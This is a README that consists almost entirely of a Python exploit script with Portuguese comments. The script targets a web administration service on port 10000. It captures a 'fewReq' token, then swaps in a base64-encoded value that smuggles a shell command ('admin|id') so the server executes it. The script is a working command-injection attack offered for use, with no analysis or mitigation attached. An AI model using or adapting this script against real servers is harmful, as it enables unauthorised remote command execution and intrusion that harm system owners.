README.md
Rendering markdown...
import requests
import re
import base64
# Configurações do alvo
TARGET = "http://192.168.199.120:10000"
USERNAME = "user"
PASSWORD = "password"
# Inicia uma sessão
session = requests.Session()
# *Passo 1: Mapeando Token (fewReq)*
token_url = f"{TARGET}/module/admin.fe"
response = session.get(token_url)
# Extraindo o token com regex
match = re.search(r"fewReq=:[A-Za-z0-9+=]+", response.text)
if not match:
print("[!] Token fewReq não encontrado.")
exit()
fewReq_original = match.group(0).split("=")[1]
print(f"[+] Token original capturado: {fewReq_original}")
# *Passo 2: Criando um novo payload com comando injetado*
cmd = "id" # Comando para testar a execução
payload = f"admin|{cmd}".encode()
fewReq_encoded = base64.b64encode(payload).decode()
# *Passo 3: Substituir fewReq na requisição privilegiada*
exploit_url = f"{TARGET}/module/admin.fe?fewReq=:B:{fewReq_encoded}"
exploit_response = session.get(exploit_url)
print("[+] Exploit executado!")
print("Resposta do servidor:")
print(exploit_response.text)